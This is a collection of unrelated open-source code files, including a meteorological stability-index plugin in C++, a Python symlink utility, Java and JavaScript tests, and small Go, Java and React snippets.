deliveries/cron.go
<reponame>robertotambunan/tweather package deliveries import ( "context" "log" ) // ActivateWheaterUpdateCron function to activate cron for wheater func (cw *CronWeather) ActivateWheater() { err := cw.weatherUsecase.PostCurrentWeather(context.Background()) if err != nil { log.Println(err) } err = cw.newsUsecase.PostTopNewsIndonesia(context.Background()) if err != nil { log.Println(err) } err = cw.newsUsecase.PostTopNewsSport(context.Background()) if err != nil { log.Println(err) } }
Brianzchen/flow-typed
definitions/npm/koa-basic-auth_v4.x.x/flow_v0.83.x-/koa-basic-auth_v4.x.x.js
<reponame>Brianzchen/flow-typed<filename>definitions/npm/koa-basic-auth_v4.x.x/flow_v0.83.x-/koa-basic-auth_v4.x.x.js declare module 'koa-basic-auth' { declare type Middleware = ( ctx: any, next: () => Promise<void> ) => Promise<void>; declare module.exports: (opts: {| name: string, pass: string, |}) => Middleware; }
fox91/himan
himan-plugins/source/stability.cpp
#include "stability.h" #include "forecast_time.h" #include "level.h" #include "lift.h" #include "logger.h" #include "numerical_functions.h" #include "plugin_factory.h" #include "stability.cuh" #include "util.h" #include <algorithm> // for std::transform #include "fetcher.h" #include "hitool.h" #include "radon.h" #include "writer.h" using namespace std; using namespace himan; using namespace himan::plugin; static level itsBottomLevel; typedef vector<double> vec; pair<vec, vec> GetSRHSourceData(const shared_ptr<info<double>>& myTargetInfo, shared_ptr<hitool> h); vec CalculateBulkShear(const vec& U, const vec& V); vec CalculateBulkShear(shared_ptr<info<double>>& myTargetInfo, shared_ptr<hitool>& h, double stopHeight); vec CalculateEffectiveBulkShear(shared_ptr<const plugin_configuration>& conf, shared_ptr<info<double>>& myTargetInfo, shared_ptr<hitool>& h, const level& sourceLevel, const level& targetLevel); #ifdef HAVE_CUDA namespace stabilitygpu { void Process(shared_ptr<const plugin_configuration> conf, shared_ptr<info<double>> myTargetInfo); } #endif namespace STABILITY { std::shared_ptr<himan::info<double>> Fetch(std::shared_ptr<const plugin_configuration>& conf, std::shared_ptr<himan::info<double>>& myTargetInfo, const himan::level& lev, const himan::param& par, bool returnPacked = false); vec Shear(const vec& lowerValues, const vec& upperValues) { vec ret(lowerValues.size()); for (size_t i = 0; i < lowerValues.size(); i++) { ret[i] = upperValues[i] - lowerValues[i]; } return ret; } vec Shear(std::shared_ptr<himan::plugin::hitool>& h, const himan::param& par, const vec& lowerHeight, const vec& upperHeight) { const auto lowerValues = h->VerticalValue<double>(par, lowerHeight); const auto upperValues = h->VerticalValue<double>(par, upperHeight); return Shear(lowerValues, upperValues); } vec Shear(std::shared_ptr<himan::plugin::hitool>& h, const himan::param& par, double lowerHeight, double upperHeight, size_t N) { const vec lower(N, lowerHeight); const vec upper(N, upperHeight); return Shear(h, par, lower, upper); } std::shared_ptr<info<double>> Fetch(std::shared_ptr<const plugin_configuration>& conf, std::shared_ptr<himan::info<double>>& myTargetInfo, const himan::level& lev, const himan::param& par, bool useCuda) { const forecast_time forecastTime = myTargetInfo->Time(); const forecast_type forecastType = myTargetInfo->ForecastType(); auto f = GET_PLUGIN(fetcher); return f->Fetch(conf, forecastTime, lev, par, forecastType, useCuda && conf->UseCudaForPacking()); } pair<vec, vec> GetEBSLevelData(shared_ptr<const plugin_configuration>& conf, shared_ptr<info<double>>& myTargetInfo, shared_ptr<hitool>& h, const level& sourceLevel, const level& targetLevel) { auto ELInfo = STABILITY::Fetch(conf, myTargetInfo, sourceLevel, param("EL-LAST-M")); const auto& EL = VEC(ELInfo); vec LPL; // LPL only exists for Max theta e level if (sourceLevel == MaxThetaELevel) { auto LPLInfo = STABILITY::Fetch(conf, myTargetInfo, sourceLevel, param("LPL-M")); LPL = VEC(LPLInfo); } else { LPL.resize(EL.size(), 2); } vec Top(EL.size(), MissingDouble()); if (targetLevel == Height0Level) { for (auto&& tup : zip_range(Top, LPL, EL)) { double& top = tup.get<0>(); const double lpl = tup.get<1>(); const double el = tup.get<2>(); top = 0.5 * (el - lpl) + lpl; } return make_pair(LPL, Top); } else if (targetLevel == MaxWindLevel) { vec Bottom = Top; // Finding maximum wind between levels LPL + 0.5*(0.6EL - LPL) and 0.6E // Hence, if LPL is on the surface, being ~0m, the search limits for maximum wind become 0.3EL ... 0.6EL for (auto&& tup : zip_range(Bottom, Top, LPL, EL)) { double& btm = tup.get<0>(); double& top = tup.get<1>(); const double lpl = tup.get<2>(); const double el = tup.get<3>(); if (el - lpl >= 3000.) { btm = 0.5 * (0.6 * el - lpl) + lpl; top = 0.6 * el; } ASSERT(btm < top || (IsMissing(btm) && IsMissing(top))); } const auto maxWind = h->VerticalMaximum(FFParam, Bottom, Top); const auto maxWindHeight = h->VerticalHeight(FFParam, Bottom, Top, maxWind); return make_pair(LPL, maxWindHeight); } throw runtime_error("Invalid target level: " + static_cast<string>(targetLevel)); } } stability::stability() { itsLogger = logger("stability"); } void stability::Process(std::shared_ptr<const plugin_configuration> conf) { Init(conf); auto r = GET_PLUGIN(radon); itsBottomLevel = level(kHybrid, stoi(r->RadonDB().GetProducerMetaData(itsConfiguration->TargetProducer().Id(), "last hybrid level number"))); #ifdef HAVE_CUDA stability_cuda::itsBottomLevel = itsBottomLevel; #endif itsThreadDistribution = ThreadDistribution::kThreadForForecastTypeAndTime; itsLevelIterator.Clear(); SetParams({CSIParam, LIParam, SIParam, CAPESParam}, {Height0Level}); SetParams({BSParam}, {OneKMLevel, ThreeKMLevel, SixKMLevel}); SetParams({SRHParam}, {OneKMLevel, ThreeKMLevel}); SetParams({TPEParam}, {ThreeKMLevel}); SetParams({EHIParam}, {OneKMLevel}); SetParams({BRNParam}, {SixKMLevel}); SetParams({FFParam}, {EuropeanMileLevel}); SetParams({QParam}, {HalfKMLevel}); SetParams({EBSParam}, {MaxWindLevel}); Start(); } vec CalculateStormRelativeHelicity(shared_ptr<const plugin_configuration> conf, shared_ptr<info<double>>& myTargetInfo, shared_ptr<hitool> h, double stopHeight, const pair<vec, vec>& UVId) { auto Uid = UVId.first; auto Vid = UVId.second; vec SRH(Uid.size(), 0); auto prevUInfo = STABILITY::Fetch(conf, myTargetInfo, itsBottomLevel, UParam); auto prevVInfo = STABILITY::Fetch(conf, myTargetInfo, itsBottomLevel, VParam); auto prevZInfo = STABILITY::Fetch(conf, myTargetInfo, itsBottomLevel, HLParam); vector<bool> found(SRH.size(), false); level curLevel = itsBottomLevel; while (curLevel.Value() > 0) { curLevel.Value(curLevel.Value() - 1); auto UInfo = STABILITY::Fetch(conf, myTargetInfo, curLevel, UParam); auto VInfo = STABILITY::Fetch(conf, myTargetInfo, curLevel, VParam); auto ZInfo = STABILITY::Fetch(conf, myTargetInfo, curLevel, HLParam); const auto& U = VEC(UInfo); const auto& V = VEC(VInfo); const auto& Z = VEC(ZInfo); const auto& prevU = VEC(prevUInfo); const auto& prevV = VEC(prevVInfo); const auto& prevZ = VEC(prevZInfo); for (size_t i = 0; i < SRH.size(); i++) { if (found[i]) { continue; } const double _Uid = Uid[i]; const double _Vid = Vid[i]; const double _pU = prevU[i]; const double _pV = prevV[i]; double _U = U[i]; double _V = V[i]; if (Z[i] > stopHeight) { ASSERT(prevZ[i] < stopHeight); _U = numerical_functions::interpolation::Linear<double>(stopHeight, prevZ[i], Z[i], _pU, _U); _V = numerical_functions::interpolation::Linear<double>(stopHeight, prevZ[i], Z[i], _pV, _V); found[i] = true; } const double res = ((_Uid - _pU) * (_pV - _V)) - ((_Vid - _pV) * (_pU - _U)); if (!IsMissing(res)) { SRH[i] -= res; } } if (found.size() == static_cast<size_t>(count(found.begin(), found.end(), true))) { break; } prevUInfo = UInfo; prevVInfo = VInfo; prevZInfo = ZInfo; } replace_if(SRH.begin(), SRH.end(), [](const double& v) { return v == 0.; }, MissingDouble()); return SRH; } vec CalculateBulkRichardsonNumber(shared_ptr<const plugin_configuration> conf, shared_ptr<info<double>>& myTargetInfo, shared_ptr<hitool> h) { auto CAPEInfo = STABILITY::Fetch(conf, myTargetInfo, level(kHeightLayer, 500, 0), param("CAPE-JKG")); const auto& CAPE = VEC(CAPEInfo); auto U6 = h->VerticalAverage<double>(UParam, 10, 6000); auto V6 = h->VerticalAverage<double>(VParam, 10, 6000); auto U05 = h->VerticalAverage<double>(UParam, 10, 500); auto V05 = h->VerticalAverage<double>(VParam, 10, 500); vec BRN(CAPE.size(), MissingDouble()); for (size_t i = 0; i < BRN.size(); i++) { BRN[i] = STABILITY::BRN(CAPE[i], U6[i], V6[i], U05[i], V05[i]); } return BRN; } vec CalculateEnergyHelicityIndex(shared_ptr<const plugin_configuration> conf, shared_ptr<info<double>>& myTargetInfo) { auto CAPEInfo = STABILITY::Fetch(conf, myTargetInfo, level(kHeightLayer, 500, 0), param("CAPE-JKG")); const auto& CAPE = VEC(CAPEInfo); const auto& SRH = VEC(myTargetInfo); vec EHI(CAPE.size(), MissingDouble()); for (size_t i = 0; i < EHI.size(); i++) { EHI[i] = CAPE[i] * SRH[i] / 160000.; } return EHI; } void CalculateHelicityIndices(shared_ptr<const plugin_configuration> conf, shared_ptr<info<double>>& myTargetInfo, shared_ptr<hitool> h) { auto UVId = GetSRHSourceData(myTargetInfo, h); myTargetInfo->Find<param>(SRHParam); myTargetInfo->Find<level>(ThreeKMLevel); const auto SRH03 = CalculateStormRelativeHelicity(conf, myTargetInfo, h, 3000, UVId); myTargetInfo->Data().Set(SRH03); myTargetInfo->Find<level>(OneKMLevel); const auto SRH01 = CalculateStormRelativeHelicity(conf, myTargetInfo, h, 1000, UVId); myTargetInfo->Data().Set(SRH01); const auto EHI01 = CalculateEnergyHelicityIndex(conf, myTargetInfo); myTargetInfo->Find<param>(EHIParam); myTargetInfo->Data().Set(EHI01); myTargetInfo->Find<level>(SixKMLevel); myTargetInfo->Find<param>(BRNParam); const auto BRN = CalculateBulkRichardsonNumber(conf, myTargetInfo, h); myTargetInfo->Data().Set(BRN); } tuple<vec, vec, vec, shared_ptr<info<double>>, shared_ptr<info<double>>, shared_ptr<info<double>>> GetLiftedIndicesSourceData(shared_ptr<const plugin_configuration>& conf, shared_ptr<info<double>>& myTargetInfo, shared_ptr<hitool>& h) { auto T500 = h->VerticalAverage<double>(TParam, 0., 500.); auto P500 = h->VerticalAverage<double>(PParam, 0., 500.); vec TD500; try { TD500 = h->VerticalAverage<double>(param("TD-K"), 0., 500.); } catch (const HPExceptionType& e) { if (e == kFileDataNotFound) { TD500 = h->VerticalAverage<double>(RHParam, 0., 500.); for (auto&& tup : zip_range(TD500, T500)) { double& res = tup.get<0>(); double t = tup.get<1>(); res = metutil::DewPointFromRH_<double>(t, res); } } } if (P500[0] < 1500) { transform(P500.begin(), P500.end(), P500.begin(), bind1st(multiplies<double>(), 100.)); // hPa to Pa } auto T850Info = STABILITY::Fetch(conf, myTargetInfo, P850Level, TParam); auto TD850Info = STABILITY::Fetch(conf, myTargetInfo, P850Level, TDParam); auto T500Info = STABILITY::Fetch(conf, myTargetInfo, P500Level, TParam); return make_tuple(T500, TD500, P500, T850Info, TD850Info, T500Info); } vec CalculateThetaE(shared_ptr<hitool>& h, double startHeight, double stopHeight) { auto Tstop = h->VerticalValue<double>(TParam, stopHeight); auto RHstop = h->VerticalValue<double>(RHParam, stopHeight); auto Pstop = h->VerticalValue<double>(PParam, stopHeight); auto Tstart = h->VerticalValue<double>(TParam, startHeight); auto RHstart = h->VerticalValue<double>(RHParam, startHeight); auto Pstart = h->VerticalValue<double>(PParam, startHeight); vec ret(Tstop.size()); for (size_t i = 0; i < Tstart.size(); i++) { const double ThetaEstart = metutil::smarttool::ThetaE_<double>(Tstart[i], RHstart[i], Pstart[i] * 100); const double ThetaEstop = metutil::smarttool::ThetaE_<double>(Tstop[i], RHstop[i], Pstop[i] * 100); ret[i] = ThetaEstart - ThetaEstop; } return ret; } void CalculateThetaEIndices(shared_ptr<const plugin_configuration>& conf, shared_ptr<info<double>>& myTargetInfo, shared_ptr<hitool>& h) { vec thetae = CalculateThetaE(h, 2, 3000); myTargetInfo->Find<level>(ThreeKMLevel); myTargetInfo->Find<param>(TPEParam); myTargetInfo->Data().Set(thetae); } void CalculateLiftedIndices(shared_ptr<const plugin_configuration>& conf, shared_ptr<info<double>>& myTargetInfo, shared_ptr<hitool>& h) { auto src = GetLiftedIndicesSourceData(conf, myTargetInfo, h); myTargetInfo->Find<level>(Height0Level); myTargetInfo->Find<param>(LIParam); auto& LI = VEC(myTargetInfo); myTargetInfo->Find<param>(SIParam); auto& SI = VEC(myTargetInfo); const auto& t500m = get<0>(src); const auto& td500m = get<1>(src); const auto& p500m = get<2>(src); const auto& t850 = VEC(get<3>(src)); const auto& td850 = VEC(get<4>(src)); const auto& t500 = VEC(get<5>(src)); vec p500(t500.size(), 50000.); vec p850(t500.size(), 85000.); for (size_t i = 0; i < t500.size(); i++) { // Lift parcel from lowest 500m average pressure to 500hPa const double t_li = metutil::Lift_<double>(p500m[i], t500m[i], td500m[i], p500[i]); // Lift parcel from 850hPa to 500hPa const double t_si = metutil::Lift_<double>(p850[i], t850[i], td850[i], p500[i]); LI[i] = t500[i] - t_li; SI[i] = t500[i] - t_si; } } vec CalculateCapeShear(shared_ptr<const plugin_configuration>& conf, shared_ptr<info<double>>& myTargetInfo, const vec& EBS) { auto CAPEInfo = STABILITY::Fetch(conf, myTargetInfo, MaxThetaELevel, param("CAPE-JKG")); const auto& CAPE = VEC(CAPEInfo); vec ret(EBS.size()); for (size_t i = 0; i < EBS.size(); i++) { ret[i] = EBS[i] * sqrt(CAPE[i]); } return ret; } void CalculateBulkShearIndices(shared_ptr<const plugin_configuration>& conf, shared_ptr<info<double>>& myTargetInfo, shared_ptr<hitool>& h) { myTargetInfo->Find<param>(BSParam); myTargetInfo->Find<level>(OneKMLevel); const auto BS01 = CalculateBulkShear(myTargetInfo, h, 1000); myTargetInfo->Data().Set(BS01); myTargetInfo->Find<level>(ThreeKMLevel); const auto BS03 = CalculateBulkShear(myTargetInfo, h, 3000); myTargetInfo->Data().Set(BS03); myTargetInfo->Find<level>(SixKMLevel); const auto BS06 = CalculateBulkShear(myTargetInfo, h, 6000); myTargetInfo->Data().Set(BS06); // CAPE shear is calculated here too const auto normEBS = CalculateEffectiveBulkShear(conf, myTargetInfo, h, MaxThetaELevel, Height0Level); const auto CAPES = CalculateCapeShear(conf, myTargetInfo, normEBS); myTargetInfo->Find<level>(Height0Level); myTargetInfo->Find<param>(CAPESParam); myTargetInfo->Data().Set(CAPES); // Calculate maximum EBS const auto muMaxEBS = CalculateEffectiveBulkShear(conf, myTargetInfo, h, MaxThetaELevel, MaxWindLevel); myTargetInfo->Find<param>(EBSParam); myTargetInfo->Find<level>(MaxWindLevel); myTargetInfo->Data().Set(muMaxEBS); } void CalculateConvectiveSeverityIndex(shared_ptr<const plugin_configuration>& conf, shared_ptr<info<double>>& myTargetInfo, shared_ptr<hitool>& h) { // For CSI we need mixed layer maximum EBS too, which is not needed anywhere else const auto mlEBS = CalculateEffectiveBulkShear(conf, myTargetInfo, h, HalfKMLevel, MaxWindLevel); auto muCAPEInfo = STABILITY::Fetch(conf, myTargetInfo, MaxThetaELevel, param("CAPE-JKG")); auto muLPLInfo = STABILITY::Fetch(conf, myTargetInfo, MaxThetaELevel, param("LPL-M")); auto mlCAPEInfo = STABILITY::Fetch(conf, myTargetInfo, HalfKMLevel, param("CAPE-JKG")); myTargetInfo->Find<param>(EBSParam); myTargetInfo->Find<level>(MaxWindLevel); const auto& muEBS = VEC(myTargetInfo); const auto& muLPL = VEC(muLPLInfo); const auto& muCAPE = VEC(muCAPEInfo); const auto& mlCAPE = VEC(mlCAPEInfo); myTargetInfo->Find<param>(CSIParam); myTargetInfo->Find<level>(Height0Level); auto& CSI = VEC(myTargetInfo); for (size_t i = 0; i < muEBS.size(); i++) { auto cape = MissingDouble(); auto ebs = MissingDouble(); if (muLPL[i] >= 250. && muCAPE[i] > 10.) { cape = muCAPE[i]; ebs = muEBS[i]; } else if (muLPL[i] < 250. && mlCAPE[i] > 10.) { cape = mlCAPE[i]; ebs = mlEBS[i]; } CSI[i] = (ebs * sqrt(2 * cape)) * 0.1; if (ebs <= 15.) { CSI[i] += 0.025 * cape * (-0.06666 * ebs + 1); } } } void stability::Calculate(shared_ptr<info<double>> myTargetInfo, unsigned short theThreadIndex) { auto myThreadedLogger = logger("stabilityThread #" + to_string(theThreadIndex)); const forecast_time forecastTime = myTargetInfo->Time(); const level forecastLevel = myTargetInfo->Level(); const forecast_type forecastType = myTargetInfo->ForecastType(); myThreadedLogger.Info("Calculating time " + static_cast<string>(forecastTime.ValidDateTime()) + " level " + static_cast<string>(forecastLevel)); auto h = GET_PLUGIN(hitool); h->Configuration(itsConfiguration); h->Time(forecastTime); h->ForecastType(forecastType); try { vec FF1500 = h->VerticalValue<double>(FFParam, 1500); myTargetInfo->Find<param>(FFParam); myTargetInfo->Find<level>(EuropeanMileLevel); myTargetInfo->Data().Set(FF1500); } catch (const HPExceptionType& e) { if (e == kFileDataNotFound) { } } try { vec Q500 = h->VerticalAverage<double>(QParam, 0, 500); myTargetInfo->Find<param>(QParam); myTargetInfo->Find<level>(HalfKMLevel); myTargetInfo->Data().Set(Q500); } catch (const HPExceptionType& e) { if (e == kFileDataNotFound) { } } string deviceType = "CPU"; #ifdef HAVE_CUDA if (itsConfiguration->UseCuda()) { deviceType = "GPU"; stabilitygpu::Process(itsConfiguration, myTargetInfo); } else #endif { try { CalculateLiftedIndices(itsConfiguration, myTargetInfo, h); myThreadedLogger.Info("Lifted index calculation finished"); } catch (const HPExceptionType& e) { itsLogger.Warning("Lifted index calculation failed"); if (e != kFileDataNotFound) { } } try { CalculateThetaEIndices(itsConfiguration, myTargetInfo, h); myThreadedLogger.Info("ThetaE index calculation finished"); } catch (const HPExceptionType& e) { itsLogger.Warning("ThetaE index calculation failed"); if (e != kFileDataNotFound) { } } try { CalculateBulkShearIndices(itsConfiguration, myTargetInfo, h); myThreadedLogger.Info("Bulk shear calculation finished"); } catch (const HPExceptionType& e) { itsLogger.Warning("Bulk shear calculation failed"); if (e != kFileDataNotFound) { } } try { CalculateHelicityIndices(itsConfiguration, myTargetInfo, h); myThreadedLogger.Info("Storm relative helicity calculation finished"); } catch (const HPExceptionType& e) { itsLogger.Warning("Storm relative helicity calculation failed"); if (e != kFileDataNotFound) { } } try { CalculateConvectiveSeverityIndex(itsConfiguration, myTargetInfo, h); } catch (const HPExceptionType& e) { itsLogger.Warning("Convective stability index calculation failed"); if (e != kFileDataNotFound) { } } } myThreadedLogger.Info("[" + deviceType + "] Missing: " + to_string(util::MissingPercent(*myTargetInfo)) + "%"); } pair<vec, vec> GetSRHSourceData(const shared_ptr<info<double>>& myTargetInfo, shared_ptr<hitool> h) { // NOTES COPIED FROM SMARTTOOLS-LIBRARY /* // ********** SRH calculation help from <NAME> ****************** Some tips here on how tyo calculate storm-relative helciity How to calculate storm-relative helicity Integrate the following from p = p_surface to p = p_top (or in case of height coordinates from h_surface to h_top): storm_rel_helicity -= ((u_ID-u[p])*(v[p]-v[p+1]))-((v_ID - v[p])*(u[p]-u[p+1])); Here, u_ID and v_ID are the forecast storm motion vectors calculated with the so-called ID-method. These can be calculated as follows: where /average wind u0_6 = average 0_6 kilometer u-wind component v0_6 = average 0_6 kilometer v-wind component (you should use a pressure-weighted average in case you work with height coordinates) /shear shr_0_6_u = u_6km - u_surface; shr_0_6_v = v_6km - v_surface; / shear unit vector shr_0_6_u_n = shr_0_6_u / ((shr_0_6_u^2 + shr_0_6_v^2)**0.5); shr_0_6_v_n = shr_0_6_v / ((shr_0_6_u^2 + shr_0_6_v^2)** 0.5); /id-vector components u_ID = u0_6 + shr_0_6_v_n * 7.5; v_ID = v0_6 - shr_0_6_u_n * 7.5; (7.5 are meters per second... watch out when you work with knots instead) */ // ********** SRH calculation help from <NAME> ****************** // average wind auto Uavg = h->VerticalAverage<double>(UParam, 10, 6000); auto Vavg = h->VerticalAverage<double>(VParam, 10, 6000); // shear auto Ushear = STABILITY::Shear(h, UParam, 10, 6000, Uavg.size()); auto Vshear = STABILITY::Shear(h, VParam, 10, 6000, Uavg.size()); // U & V id vectors vec Uid(Ushear.size(), MissingDouble()); auto Vid = Uid; for (size_t i = 0; i < Ushear.size(); i++) { STABILITY::UVId(Ushear[i], Vshear[i], Uavg[i], Vavg[i], Uid[i], Vid[i]); } return make_pair(Uid, Vid); } void stability::WriteToFile(const shared_ptr<info<double>> targetInfo, write_options writeOptions) { auto aWriter = GET_PLUGIN(writer); aWriter->WriteOptions(writeOptions); // writing might modify iterator positions --> create a copy auto tempInfo = make_shared<info<double>>(*targetInfo); tempInfo->Reset<level>(); while (tempInfo->Next<level>()) { for (tempInfo->Reset<param>(); tempInfo->Next<param>();) { if (!tempInfo->IsValidGrid()) { continue; } aWriter->ToFile(tempInfo, itsConfiguration); } } if (itsConfiguration->UseDynamicMemoryAllocation()) { DeallocateMemory(*targetInfo); } } vec CalculateBulkShear(const vec& U, const vec& V) { vec BS(U.size()); for (size_t i = 0; i < U.size(); i++) { BS[i] = hypot(U[i], V[i]); } return BS; } vec CalculateBulkShear(shared_ptr<info<double>>& myTargetInfo, shared_ptr<hitool>& h, double stopHeight) { const auto U = STABILITY::Shear(h, UParam, 10, stopHeight, myTargetInfo->SizeLocations()); const auto V = STABILITY::Shear(h, VParam, 10, stopHeight, myTargetInfo->SizeLocations()); return CalculateBulkShear(U, V); } vec CalculateEffectiveBulkShear(shared_ptr<const plugin_configuration>& conf, shared_ptr<info<double>>& myTargetInfo, shared_ptr<hitool>& h, const level& sourceLevel, const level& targetLevel) { const auto Levels = STABILITY::GetEBSLevelData(conf, myTargetInfo, h, sourceLevel, targetLevel); const auto U = STABILITY::Shear(h, UParam, Levels.first, Levels.second); const auto V = STABILITY::Shear(h, VParam, Levels.first, Levels.second); return CalculateBulkShear(U, V); }
ypiel-talend/components
services/components-api-service-rest/src/test/java/org/talend/components/service/rest/configuration/ComponentsRegistrySetupTest.java
package org.talend.components.service.rest.configuration; import static org.hamcrest.MatcherAssert.assertThat; import static org.hamcrest.Matchers.arrayWithSize; import org.junit.Test; public class ComponentsRegistrySetupTest { @Test public void testExtractComponentsUrls() { // checking with a null string ComponentsRegistrySetup registrySetup = new ComponentsRegistrySetup(); assertThat(registrySetup.extractComponentsUrls(null), arrayWithSize(0)); // checking with working URLs assertThat(registrySetup.extractComponentsUrls("file://foo,file://bar"), arrayWithSize(2)); // checking with one working URL and one wrong one assertThat(registrySetup.extractComponentsUrls("file://foo,groovybaby://bar"), arrayWithSize(1)); } // TODO need more tests on the createDefinitionRegistry }
likianta/depsland
depsland/utils/mklink.py
<filename>depsland/utils/mklink.py<gh_stars>0 import os from os.path import exists from pathlib import Path from lk_logger import lk class T: import typing as t FileExistScheme = t.Literal['error', 'keep', 'overwrite'] List = t.List Optional = t.Optional Path = str Paths = t.List[Path] def mklink(src: T.Path, dst: T.Path, force=False) -> T.Path: """ references: common method to create symlink: https://csatlas.com/python-create-symlink/ """ assert exists(src), f'source path does not exist: {src}' if force is True and exists(dst): return dst if force is False and exists(dst): raise FileExistsError(f'destination path already exists: {dst}') Path(dst).symlink_to(src) return dst def mklinks(src_dir: T.Path, dst_dir: T.Path, names: T.Optional[T.List[str]] = None, force=False) -> T.Paths: out = [] for n in (names or os.listdir(src_dir)): out.append(mklink(f'{src_dir}/{n}', f'{dst_dir}/{n}', force=force)) return out def mergelink(src_dir: T.Path, dst_dir: T.Path, new_dir: T.Path, file_exist_scheme: T.FileExistScheme = 'error') -> T.Path: src_names = os.listdir(src_dir) dst_names = os.listdir(dst_dir) for sn in src_names: sub_src_path = f'{src_dir}/{sn}' sub_dst_path = f'{dst_dir}/{sn}' sub_new_path = f'{new_dir}/{sn}' if sn in dst_names: if os.path.isdir(sub_src_path): os.mkdir(sub_new_path) mergelink( sub_src_path, sub_dst_path, sub_new_path, file_exist_scheme ) else: if file_exist_scheme == 'error': raise FileExistsError(sub_dst_path) elif file_exist_scheme == 'keep': mklink(sub_dst_path, sub_new_path) elif file_exist_scheme == 'overwrite': mklink(sub_src_path, sub_new_path) else: mklink(sub_src_path, sub_new_path) new_names = os.listdir(new_dir) for n in dst_names: sub_dst_path = f'{dst_dir}/{n}' sub_new_path = f'{new_dir}/{n}' assert exists(sub_dst_path), ( n, n in os.listdir(dst_dir), sub_dst_path ) if n not in new_names: mklink(sub_dst_path, sub_new_path) return new_dir def mergelinks(src_dir: T.Path, dst_dir: T.Path, file_exist_scheme: T.FileExistScheme = 'error') -> T.Paths: out = [] dst_names = os.listdir(dst_dir) for n in os.listdir(src_dir): src_path = f'{src_dir}/{n}' dst_path = f'{dst_dir}/{n}' if n in dst_names: if os.path.isdir(src_path): lk.logt('[D2205]', f'merging "{n}" ({src_dir} -> {dst_dir})') temp = dst_path while exists(temp): temp += '_bak' else: os.rename(dst_path, temp) new_path = dst_path dst_path = temp if not exists(new_path): os.mkdir(new_path) # os.makedirs(new_path, exist_ok=True) mergelink(src_path, dst_path, new_path, file_exist_scheme) else: if file_exist_scheme == 'error': raise FileExistsError(dst_path) elif file_exist_scheme == 'keep': pass elif file_exist_scheme == 'override': os.remove(dst_path) mklink(src_path, dst_path) else: mklink(src_path, dst_path, force=False) out.append(dst_path) return out
Yannic/chromium
third_party/blink/web_tests/http/tests/devtools/sources/debugger-ui/async-call-stack-worker.js
<filename>third_party/blink/web_tests/http/tests/devtools/sources/debugger-ui/async-call-stack-worker.js // Copyright 2017 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. (async function() { TestRunner.addResult(`Tests async call stack for workers.\n`); await TestRunner.loadModule('sources'); await TestRunner.loadTestModule('sources_test_runner'); await TestRunner.showPanel('sources'); await TestRunner.evaluateInPagePromise( ` var response = ` + '`' + ` postMessage('ready'); self.onmessage=function(e){ debugger; } //# sourceURL=worker.js` + '`' + `; var blob = new Blob([response], {type: 'application/javascript'}); function testFunction() { var worker = new Worker(URL.createObjectURL(blob)); worker.onmessage = function(e) { worker.postMessage(42); }; }`); SourcesTestRunner.startDebuggerTestPromise(/* quiet */ true) .then(() => SourcesTestRunner.runTestFunctionAndWaitUntilPausedPromise()) .then( () => TestRunner.addSnifferPromise( Sources.CallStackSidebarPane.prototype, 'updatedForTest')) .then(() => dumpCallStackSidebarPane()) .then(() => SourcesTestRunner.completeDebuggerTest()); function dumpCallStackSidebarPane() { var pane = Sources.CallStackSidebarPane.instance(); for (var element of pane.contentElement.querySelectorAll( '.call-frame-item')) TestRunner.addResult(element.deepTextContent() .replace(/VM\d+/g, 'VM') .replace(/blob:http:[^:]+/, 'blob')); } })();
yunseong/incubator-nemo
compiler/optimizer/src/main/java/org/apache/nemo/compiler/optimizer/pass/compiletime/annotating/DefaultMetricPass.java
/* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.apache.nemo.compiler.optimizer.pass.compiletime.annotating; import org.apache.nemo.common.DataSkewMetricFactory; import org.apache.nemo.common.HashRange; import org.apache.nemo.common.KeyRange; import org.apache.nemo.common.dag.DAG; import org.apache.nemo.common.ir.edge.IREdge; import org.apache.nemo.common.ir.edge.executionproperty.CommunicationPatternProperty; import org.apache.nemo.common.ir.edge.executionproperty.DataSkewMetricProperty; import org.apache.nemo.common.ir.vertex.IRVertex; import org.apache.nemo.common.ir.vertex.executionproperty.ParallelismProperty; import java.util.HashMap; import java.util.Map; /** * Pass for initiating IREdge Metric ExecutionProperty with default key range. */ @Annotates(DataSkewMetricProperty.class) public final class DefaultMetricPass extends AnnotatingPass { /** * Default constructor. */ public DefaultMetricPass() { super(DefaultMetricPass.class); } @Override public DAG<IRVertex, IREdge> apply(final DAG<IRVertex, IREdge> dag) { dag.topologicalDo(dst -> dag.getIncomingEdgesOf(dst).forEach(edge -> { if (CommunicationPatternProperty.Value.Shuffle .equals(edge.getPropertyValue(CommunicationPatternProperty.class).get())) { final int parallelism = dst.getPropertyValue(ParallelismProperty.class).get(); final Map<Integer, KeyRange> metric = new HashMap<>(); for (int i = 0; i < parallelism; i++) { metric.put(i, HashRange.of(i, i + 1, false)); } edge.setProperty(DataSkewMetricProperty.of(new DataSkewMetricFactory(metric))); } })); return dag; } }
Floating-Island/Java-Exercises-_2018__ES_
Ejercicios/05 - Manejo de colecciones/02/src/bebidas/Bebida.java
package bebidas; public class Bebida { private String marca; public Bebida(String m) { marca = m; } public String queMarca() { return marca; } @Override public String toString() { return "Bebida [marca=" + marca + "]"; } @Override public int hashCode() { final int prime = 31; int result = 1; result = prime * result + ((marca == null) ? 0 : marca.hashCode()); return result; } @Override public boolean equals(Object obj) { if (this == obj) return true; if (obj == null) return false; if (getClass() != obj.getClass()) return false; Bebida other = (Bebida) obj; if (marca == null) { if (other.marca != null) return false; } else if (!marca.equals(other.marca)) return false; return true; } }
Fragmented-World/fragmented-web-ui
src/styles/PointerLink.js
<reponame>Fragmented-World/fragmented-web-ui import styled from 'styled-components' const PointerLink = styled.a` cursor: pointer; ` export default PointerLink
jacadcaps/webkitty
Source/WebCore/svg/SVGRadialGradientElement.cpp
